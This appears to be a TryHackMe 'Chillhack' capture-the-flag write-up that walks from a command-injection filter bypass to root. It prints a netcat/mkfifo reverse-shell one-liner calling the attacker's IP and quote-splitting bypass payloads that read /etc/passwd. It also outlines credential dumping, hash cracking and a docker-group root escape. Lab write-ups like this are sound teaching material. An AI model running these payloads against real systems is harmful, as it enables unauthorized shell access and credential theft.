Chillhack is a medium level challenge on TryHackMe. The start of the challenge requires finding a command injection bypass to get an initial shell. On that shell, you can execute a script that has fields you can manipulate to elevate to another user. As the other user, I find a MySQL database and a new web service running. After finding credentials to the MySQL database, you can dump hashes for the new web service. Cracking these and logging into the web service provides only an image. Downloading this image I find it has a password protected zip file. Using zip2john I can crack this zip file and find another password for a new user. Logging in to this user I find they are part of the docker group, which I use to elevate to root.

Let's find out:-

Starting off with an nmap scan I find FTP, SSH and HTTP is open

Logging into FTP I find a file named note.txt

Downloading and reading note.txt I find out that there are strings being filtered somewhere

After looking at the website on the browser, I see a lot dead links

Running gobuster I find /secret page.

Navigation to /secret page. I see a text field with an execute button

Exploitation

Under /secretI try to execute the command. Testing whoami I find it executes

Trying other commands, I see there is some sort of filtering going on as I get an error message trying to run cat /etc/passwd

I want to bypass this filtering, so I use different payloads. Trying the first option cat</etc/passwd I find this works and we can bypass the filtering to execute the command

However, we know we can run whoami, so I test double quotes with cat command. My payload is c"a"t /etc/passwd and I find this works

I have to bypass this filtering through reverse shell. The most reliable is the second netcat one. I only need a single quote to bypass the filter. My final payload is r"m" /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.212.142 1234 >/tmp/f After setting up a nc listener, I gain a reverse shell by executing this

Getting apaar User

Before proceeding, I import python3 into my shell

Going into the home directory, I find there are 3 folders, but only one can be opened

Before starting my enumeration, First I want to know that if I can run any commands as sudo. Here, I find I can run a script named .helpline.sh as apaar.

After reading this file, I see it will prompt for two input and then points them to /dev/null

This script appears to execute the second command. I want to test this, so I run the script as apaar and try to execute /bin/sh which will log in me in as apaar

I imported python3 again to the shell

I can read local.txt file. And we have our first flag.

Privilege Escalation

Finding MYSQL credentials

As apaar, I run LinEnum.sh to find out more information about the box. I set up a python HTTPServer on my local machine then I uploaded the script using curl

I found out two internal ports that were not shown in nmap scan. 9001 and 3306.

I knew already that 3306 is a SQL server, but I was not sure about 9001, so I decided to set up port forwarding. And for that, I need to generate ssh keys on my local machine.

I have generated two files, id_rsa and id_rsa.pub I took the contents of id_rsa.pub and put them in toauthorized_keys file under /home/apaar/.ssh

Now I am ready to set up port forwarding on port 9001.

I can now access port 9001 on 127.0.0.1 Here I found out that it is a website with a login portal

I need a username and password, so I decided to check out that if there are hardcoded credentials. Under /var/www I find /filesLooking through the files directory, I find hard coded credentials in the index.php file.

Using these credentials, I can login to mysql

In MySQL server, I found a database of webportal

Then I found out that there is only one user in the tables of this database. So I decided to dump the information to get 2 users and hashes.

Let's save these two hashes

Now let’s crack these two hashes and for this, I am using john.

Now, I have two passwords and two usernames. Testing both, I can login to port 9001, but I found an image and some text.

I downloaded that image and used steghide to extract information, after getting results I found one file “Backup.zip”

This image is locked and I can open this lock using zip2jhon.

Now, I can unzip that backup.zip file. And then I found another file source_code.zip

In this file, there is a base64 encoded password.

Base64 can be decoded.

Using this password, I came to know that I can log in as anurodh

I run LinEnum.sh again as a new user.

So, this user is a part of docker group.

Looking on gtfobins I see a possible shell escape to get root. Running this gives me the root user

Now, I am a root so I can read proof.txt

Security Researcher